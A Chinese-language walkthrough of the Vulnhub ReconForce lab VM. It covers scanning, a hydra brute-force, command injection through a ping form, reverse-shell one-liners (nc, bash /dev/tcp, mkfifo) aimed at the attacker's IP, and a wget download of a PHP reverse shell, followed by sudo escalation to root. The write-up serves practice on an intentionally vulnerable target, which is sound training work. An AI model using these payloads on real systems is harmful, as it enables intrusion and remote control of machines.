首页 > 其他分享 >Vulnhub之ReconForce靶机详细测试过程

Vulnhub之ReconForce靶机详细测试过程

时间:2022-12-17 12:57:20浏览次数:36  
标签:56.170 recon kali ReconForce 192.168 -- Vulnhub 靶机 root

ReconForce

作者:jason_huawen

靶机基本信息

名称:ReconForce (v1.1)

地址:

https://www.vulnhub.com/entry/hacknos-reconforce-v11,416/

识别目标主机IP地址

──(kali㉿kali)-[~/Vulnhub/ReconForce]
└─$ sudo netdiscover -i eth1
Currently scanning: 172.26.164.0/16   |   Screen View: Unique Hosts                                                        
                                                                                                                            
 5 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 300                                                            
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:0a      1      60  Unknown vendor                                                           
 192.168.56.100  08:00:27:e3:e8:c6      2     120  PCS Systemtechnik GmbH                                                   
 192.168.56.170  08:00:27:c7:d4:69      2     120  PCS Systemtechnik GmbH  

利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为192.168.56.170

NMAP扫描

用NMAP工具对目标主机进行全端口扫描:

┌──(kali㉿kali)-[~/Vulnhub/ReconForce]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.170 -oN nmap_full_scan
Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-16 22:03 EST
Nmap scan report for bogon (192.168.56.170)
Host is up (0.00017s latency).
Not shown: 65532 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 2.0.8 or later
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:192.168.56.206
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open  ssh     OpenSSH 8.0p1 Ubuntu 6build1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 6f96946572800893239020bc76dfb8ec (RSA)
|   256 6fbb491aa9b6e5008419a0e42bc457c4 (ECDSA)
|_  256 ce3d9405f4a682c47f3fba371df623b0 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title:  Recon_Web
|_http-server-header: Apache/2.4.41 (Ubuntu)
MAC Address: 08:00:27:C7:D4:69 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.31 seconds

NMAP扫描结果表明目标主机有3个开放端口:21(FTP)、22(SSH)、80(HTTP)

获得Shell

先来看目标主机上的21端口:

──(kali㉿kali)-[~/Vulnhub/ReconForce]
└─$ ftp 192.168.56.170
Connected to 192.168.56.170.
220 "Security@hackNos".
Name (192.168.56.170:kali): anonymous
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -alh
229 Entering Extended Passive Mode (|||59422|)
150 Here comes the directory listing.
drwxr-xr-x    2 0        117          4096 Jan 06  2020 .
drwxr-xr-x    2 0        117          4096 Jan 06  2020 ..
226 Directory send OK.
ftp> put test.txt 
local: test.txt remote: test.txt
229 Entering Extended Passive Mode (|||51089|)
550 Permission denied.
ftp> 

对FTP服务的分析如下:

  1. 允许匿名访问

  2. 没有任何文件

  3. 匿名用户不能上传文件

  4. 这里需要尤其注意FTP返回的banner, 这有可能是用户名或者密码!!!

再来看80端口:

┌──(kali㉿kali)-[~/Vulnhub/ReconForce]
└─$ curl http://192.168.56.170
<!DOCTYPE HTML>
<html>
<head>
<title> Recon_Web</title>
<link rel="stylesheet" type="text/css" href="css/style.css">

</head>
<body>
<header>
<div class="main">
  <div class="logo">
  <img src="logo.png">
  </div>
<ul>
<li><a href="#">Home</a></li>
<li><a href="https://www.reconforce.in" target="_blank">Service</a></li>
<li><a href="https://www.hacknos.com/os-hacknos-3-walkthrough-vulnhub-ctf/" target="_blank">Blog</a></li>>
</ul>

</div>

<div class="title">
<h1>hackNos</h1></div>

<div class="button">
<a href="5ecure/" class="btn">TroubleShoot</a>>
</div>
    
</header>

</body>

</html>


返回的页面中有链接5ecure,访问该链接,弹出HTTP基本认证窗口。

──(kali㉿kali)-[~/Vulnhub/ReconForce]
└─$ nikto -h http://192.168.56.170
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.170
+ Target Hostname:    192.168.56.170
+ Target Port:        80
+ Start Time:         2022-12-16 22:28:39 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.41 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /, inode: 294, size: 59bd0f09b74ac, mtime: gzip
+ Allowed HTTP Methods: GET, POST, OPTIONS, HEAD 
+ OSVDB-3268: /css/: Directory indexing found.
+ OSVDB-3092: /css/: This might be interesting...
+ 7917 requests: 0 error(s) and 7 item(s) reported on remote host
+ End Time:           2022-12-16 22:29:34 (GMT-5) (55 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested


      *********************************************************************
      Portions of the server's headers (Apache/2.4.41) are not in
      the Nikto 2.1.6 database or are newer than the known string. Would you like
      to submit this information (*no server specific data*) to CIRT.net
      for a Nikto update (or you may email to [email protected]) (y/n)? 

                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/ReconForce]
└─$ gobuster dir -u http://192.168.56.170 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.170
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.3
[+] Timeout:                 10s
===============================================================
2022/12/16 22:30:08 Starting gobuster in directory enumeration mode
===============================================================
/css                  (Status: 301) [Size: 314] [--> http://192.168.56.170/css/]
/server-status        (Status: 403) [Size: 279]
Progress: 219419 / 220561 (99.48%)===============================================================
2022/12/16 22:31:17 Finished
===============================================================
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/ReconForce]
└─$ gobuster dir -u http://192.168.56.170 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.txt,.html,.sh
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.170
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.3
[+] Extensions:              txt,html,sh,php
[+] Timeout:                 10s
===============================================================
2022/12/16 22:31:32 Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
/index.html           (Status: 200) [Size: 660]
/css                  (Status: 301) [Size: 314] [--> http://192.168.56.170/css/]
/.html                (Status: 403) [Size: 279]
/.php                 (Status: 403) [Size: 279]
/server-status        (Status: 403) [Size: 279]
Progress: 1101939 / 1102805 (99.92%)===============================================================
2022/12/16 22:37:42 Finished
===============================================================

Gobuster工具没有扫描出任何目录或者文件,那继续看一下在5ecure目录下有无子目录或者文件:

┌──(kali㉿kali)-[~/Vulnhub/ReconForce]
└─$ gobuster dir -u http://192.168.56.170/5ecure -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.txt,.html,.sh
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.170/5ecure
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.3
[+] Extensions:              php,txt,html,sh
[+] Timeout:                 10s
===============================================================
2022/12/16 22:38:56 Starting gobuster in directory enumeration mode
===============================================================
Error: the server returns a status code that matches the provided options for non existing urls. http://192.168.56.170/5ecure/354f2192-e3f7-45d0-a2d1-4b07b1c267aa => 401 (Length: 461). To continue please exclude the status code or the length
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/ReconForce]
└─$ gobuster dir --help | grep exclude
      --exclude-length ints               exclude the following content length (completely ignores the status). Supply multiple times to exclude multiple sizes.
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/ReconForce]
└─$ gobuster dir -u http://192.168.56.170/5ecure -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.txt,.html,.sh --exclude-lenght 461
Error: unknown flag: --exclude-lenght
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/ReconForce]
└─$ gobuster dir -u http://192.168.56.170/5ecure -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.txt,.html,.sh --exclude-length 461
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.170/5ecure
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] Exclude Length:          461
[+] User Agent:              gobuster/3.3
[+] Extensions:              php,txt,html,sh
[+] Timeout:                 10s
===============================================================
2022/12/16 22:40:09 Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
/.php                 (Status: 403) [Size: 279]
Progress: 1101538 / 1102805 (99.89%)===============================================================
2022/12/16 22:46:14 Finished
===============================================================

也没有任何收获,那接下来看能否破解/5ecure的登录信息:

┌──(kali㉿kali)-[~/Vulnhub/ReconForce]
└─$ hydra -l admin -P /usr/share/wordlists/rockyou.txt -s 80 -f 192.168.56.170 http-get /5ecure      
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-12-16 22:52:48
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-get://192.168.56.170:80/5ecure
[STATUS] 8741.00 tries/min, 8741 tries in 00:01h, 14335658 to do in 27:21h, 16 active
[STATUS] 8883.33 tries/min, 26650 tries in 00:03h, 14317749 to do in 26:52h, 16 active
^C^CThe session file ./hydra.restore was written. Type "hydra -R" to resume session.

没有破解出来,其实Ftp登录时的banner有个信息为:

┌──(kali㉿kali)-[~/Vulnhub/ReconForce]
└─$ ftp 192.168.56.170
Connected to 192.168.56.170.
220 "Security@hackNos".
Name (192.168.56.170:kali): ^C

因此猜测密码为: Security@hackNos

登录/5ecure(用户名为admin)

登录成功为一个ping执行命令窗口,看有无命令注入漏洞:

127.0.0.1;ls 没有任何输出,说明有过滤机制

127.0.0.1&&ls 没有任何输出

127.0.0.1 || ls 发现有输出,输出结果为:

css
index.html
logo.png
out.php

接下来看能否反弹一个shell

nc -e /bin/bash '192.168.56.206' 5555

执行失败,没有得到shell

127.0.0.1;bash -i >& /dev/tcp/192.168.56.206/5555 0>&1

执行失败,没有得到shell

127.0.0.1||rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.206 5555 >/tmp/
┌──(kali㉿kali)-[~/Vulnhub/ReconForce]
└─$ sudo nc -nlvp 5555                                         
[sudo] password for kali: 
listening on [any] 5555 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.170] 34278
id
which python

虽然得到目标主机的连接,但是执行命令没有反应。

由于cat命令没有被过滤,因此看一下目标主机有哪些过滤机制:

 '',
        ';'  => '',
        '| ' => '',
        '-'  => '',
        '$'  => '',
        '('  => '',
        ')'  => '',
        '`'  => '',
        '||' => '',
    );

    // Remove any of the charactars in the array (blacklist).
    $target = str_replace( array_keys( $substitutions ), $substitutions, $target );

    // Determine OS and execute the ping command.
    if( stristr( php_uname( 's' ), 'Windows NT' ) ) {
        // Windows
        $cmd = shell_exec( 'ping  ' . $target );
    }
    else {
        // *nix
        $cmd = shell_exec( 'ping  -c 4 ' . $target );
    }

    // Feedback for the end user
    echo "

{$cmd}

";
}

?> 

wget应该不会被过滤,因此可以将shell.php下载到目标主机:

┌──(kali㉿kali)-[~/Vulnhub/ReconForce]
└─$ cp ~/Toolsets/php-reverse-shell-1.0/php-reverse-shell.php .
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/ReconForce]
└─$ ls
hydra.restore  nmap_full_scan  php-reverse-shell.php  req.txt  test.txt
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/ReconForce]
└─$ mv php-reverse-shell.php shell.php
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/ReconForce]
└─$ vim shell.php  
                                                                                                                              
┌──(kali㉿kali)-[~/Vulnhub/ReconForce]
└─$ python -m http.server  
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
192.168.56.170 - - [16/Dec/2022 23:16:58] "GET /shell.php HTTP/1.1" 200 -

在浏览器中输入:

127.0.0.1|| wget http://192.168.56.206:8000/shell.php

然后验证一下是否上传成功?

127.0.0.1|| ls
1
css
index.html
logo.png
out.php
shell.php

可以发现shell.php可以被成功上传,你接下来访问该shell.php文件,从而得到反弹的shell

http://192.168.56.170/5ecure/shell.php

在Kali Linux上成功得到反弹回来的shell

┌──(kali㉿kali)-[~/Vulnhub/ReconForce]
└─$ sudo nc -nlvp 5555                                         
[sudo] password for kali: 
listening on [any] 5555 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.170] 34288
Linux hacknos 5.3.0-24-generic #26-Ubuntu SMP Thu Nov 14 01:33:18 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
 12:19:44 up  1:26,  0 users,  load average: 0.00, 0.02, 0.59
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ which python
/usr/bin/python
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@hacknos:/$ cd /home
cd /home
www-data@hacknos:/home$ ls -alh
ls -alh
total 12K
drwxr-xr-x  3 root  root   4.0K Jan 10  2020 .
drwxr-xr-x 20 root  root   4.0K Jan  6  2020 ..
drwxr-xr-x  4 recon docker 4.0K Jan 10  2020 recon
www-data@hacknos:/home$ cd recon
cd recon
www-data@hacknos:/home/recon$ ls -alh
ls -alh
total 32K
drwxr-xr-x 4 recon docker 4.0K Jan 10  2020 .
drwxr-xr-x 3 root  root   4.0K Jan 10  2020 ..
-rw------- 1 recon docker    0 Jan 10  2020 .bash_history
-rw-r--r-- 1 recon docker  220 May  5  2019 .bash_logout
-rw-r--r-- 1 recon docker 3.7K May  5  2019 .bashrc
drwx------ 2 recon docker 4.0K Jan  6  2020 .cache
drwx------ 3 recon docker 4.0K Jan  6  2020 .gnupg
-rw-r--r-- 1 recon docker  807 May  5  2019 .profile
-rw-r--r-- 1 recon docker    0 Jan  6  2020 .sudo_as_admin_successful
-rw-r--r-- 1 root  root     87 Jan 10  2020 user.txt
www-data@hacknos:/home/recon$ cat user.txt
cat user.txt
###########################################

MD5HASH: bae11ce4f67af91fa58576c1da2aad4b
www-data@hacknos:/home/recon$        

提权

www-data@hacknos:/home$ cd recon
cd recon
www-data@hacknos:/home/recon$ ls -alh
ls -alh
total 32K
drwxr-xr-x 4 recon docker 4.0K Jan 10  2020 .
drwxr-xr-x 3 root  root   4.0K Jan 10  2020 ..
-rw------- 1 recon docker    0 Jan 10  2020 .bash_history
-rw-r--r-- 1 recon docker  220 May  5  2019 .bash_logout
-rw-r--r-- 1 recon docker 3.7K May  5  2019 .bashrc
drwx------ 2 recon docker 4.0K Jan  6  2020 .cache
drwx------ 3 recon docker 4.0K Jan  6  2020 .gnupg
-rw-r--r-- 1 recon docker  807 May  5  2019 .profile
-rw-r--r-- 1 recon docker    0 Jan  6  2020 .sudo_as_admin_successful
-rw-r--r-- 1 root  root     87 Jan 10  2020 user.txt
www-data@hacknos:/home/recon$ 

可以看到recon用户有sudo 权限,前面admin的web登录用户密码会不会也是recon的密码呢,试一试!

www-data@hacknos:/home/recon$ su - recon
su - recon
Password: Security@hackNos

recon@hacknos:~$ id
id
uid=1000(recon) gid=119(docker) groups=119(docker),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),115(lxd)
recon@hacknos:~$ sudo -l
sudo -l
[sudo] password for recon: Security@hackNos

Matching Defaults entries for recon on hacknos:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User recon may run the following commands on hacknos:
    (ALL : ALL) ALL
recon@hacknos:~$ sudo /bin/bash
sudo /bin/bash
root@hacknos:/home/recon# cd /root
cd /root
root@hacknos:~# ls -alh
ls -alh
total 40K
drwx------  6 root root 4.0K Jan 17  2020 .
drwxr-xr-x 20 root root 4.0K Jan  6  2020 ..
-rw-------  1 root root    0 Jan 10  2020 .bash_history
-rw-r--r--  1 root root 3.1K Aug 27  2019 .bashrc
drwx------  2 root root 4.0K Jan 17  2020 .cache
drwx------  3 root root 4.0K Jan 17  2020 .gnupg
-rw-r--r--  1 root root  148 Aug 27  2019 .profile
-rw-r--r--  1 root root  876 Jan 10  2020 root.txt
drwxr-xr-x  3 root root 4.0K Jan  6  2020 snap
drwx------  2 root root 4.0K Jan  6  2020 .ssh
-rw-------  1 root root  856 Jan 17  2020 .viminfo
root@hacknos:~# cat root.txt
cat root.txt
     $$\          $$$$$$$\                                          
     \$$\         $$  __$$\                                         
$$$$\ \$$\        $$ |  $$ | $$$$$$\   $$$$$$$\  $$$$$$\  $$$$$$$\  
\____| \$$\       $$$$$$$  |$$  __$$\ $$  _____|$$  __$$\ $$  __$$\ 
$$$$\  $$  |      $$  __$$< $$$$$$$$ |$$ /      $$ /  $$ |$$ |  $$ |
\____|$$  /       $$ |  $$ |$$   ____|$$ |      $$ |  $$ |$$ |  $$ |
     $$  /        $$ |  $$ |\$$$$$$$\ \$$$$$$$\ \$$$$$$  |$$ |  $$ |
     \__/         \__|  \__| \_______| \_______| \______/ \__|  \__|
                                                                    
                                                                    
                                                                    

MD5HASH: bae11ce4f67af91fa58576c1da2aad4b

Author: Rahul Gehlaut

WebBlog: www.hackNos.com

Twitter: @rahul_gehlaut
root@hacknos:~# 

成功拿到root flag.

经验教训

  1. 在信息有限的情况下,尤其需要注意作者所给出的提示,比如本靶机中FTP的Banner信息,如果这个信息被遗漏,将没有办法继续进行后面的动作。

  2. 拿目标的shell,一方面可以通过执行命令,另一方面,也可以将shell.php脚本上传至目标主机。

标签:56.170,recon,kali,ReconForce,192.168,--,Vulnhub,靶机,root
From: https://www.cnblogs.com/jason-huawen/p/16988838.html

相关文章

  • Vulnhub之Replay靶机测试过程(部分)
    Replay识别目标主机IP地址(kali㉿kali)-[~/Vulnhub/Replay]└─$sudonetdiscover-ieth1Currentlyscanning:192.168.64.0/16|ScreenView:UniqueHosts......
  • Vulnhub之Ripper靶机详细测试过程
    Ripper识别目标主机IP地址──(kali㉿kali)-[~/Vulnhub/ripper]└─$sudonetdiscover-ieth1Currentlyscanning:172.16.173.0/16|ScreenView:UniqueHost......
  • 利用木马钓鱼渗透浏览器漏洞靶机
    1准备环境win7虚拟机:192.168.225.140cn_windows_7_ultimate_x64_dvd_x15-66043.isokali2020.4:192.168.225.138kali-linux-2020.4-vmware-amd64.7z如果ssh连接不到kal......
  • Vulnhub之Shuriken 1 靶机测试过程
    Shuriken识别目标主机IP地址─(kali㉿kali)-[~/Vulnhub/Shuriken]└─$sudonetdiscover-ieth1Currentlyscanning:192.168.62.0/16|ScreenView:UniqueHo......
  • vulnhub-Tr0ll
    本机ip:192.168.10.7靶机ip:192.168.10.8扫描nmap-sn192.168.10.7/24nmap-sS-sV-A-p-192.168.10.8Nmapscanreportfor192.168.10.8Hostisup(0.0017slate......
  • Vulnhub之So Simple靶机详细测试过程
    SoSimple作者:jason_huawen靶机基本信息名称:SoSimple:1地址:https://www.vulnhub.com/entry/so-simple-1,515/识别目标主机IP地址─(kali㉿kali)-[~/Vulnhub/So_s......
  • vulnhub-Raven2
    搜集信息kaliip:192.168.56.109/24发现目标:nmap-sn192.168.56.109/24或nmap-sP192.168.56.109/24靶机ip:192.168.56.114扫描端口nmap-A-p-192.168.56.114No......
  • Vulnhub之TBBT FunWithFlags靶机详细测试过程
    TBBTFunWithFlags作者:jason_huawen靶机基本信息名称:TBBT:FunWithFlags地址:https://www.vulnhub.com/entry/tbbt-funwithflags,437/其他说明:靶机配置静态IP地址,因......
  • Vulnhub之Temple of Doom靶机详细测试过程
    TempleofDoom1靶机基本信息作者:jason_huawen名称:TempleofDoom:1地址:https://www.vulnhub.com/entry/temple-of-doom-1,243/识别目标主机IP地址─(kali㉿kal......
  • Vulnhub之Thales 1靶机测试过程
    Thales1识别目标主机IP地址─(kali㉿kali)-[~/Vulnhub/Thales_1]└─$sudonetdiscover-ieth1Currentlyscanning:192.168.60.0/16|ScreenView:UniqueHo......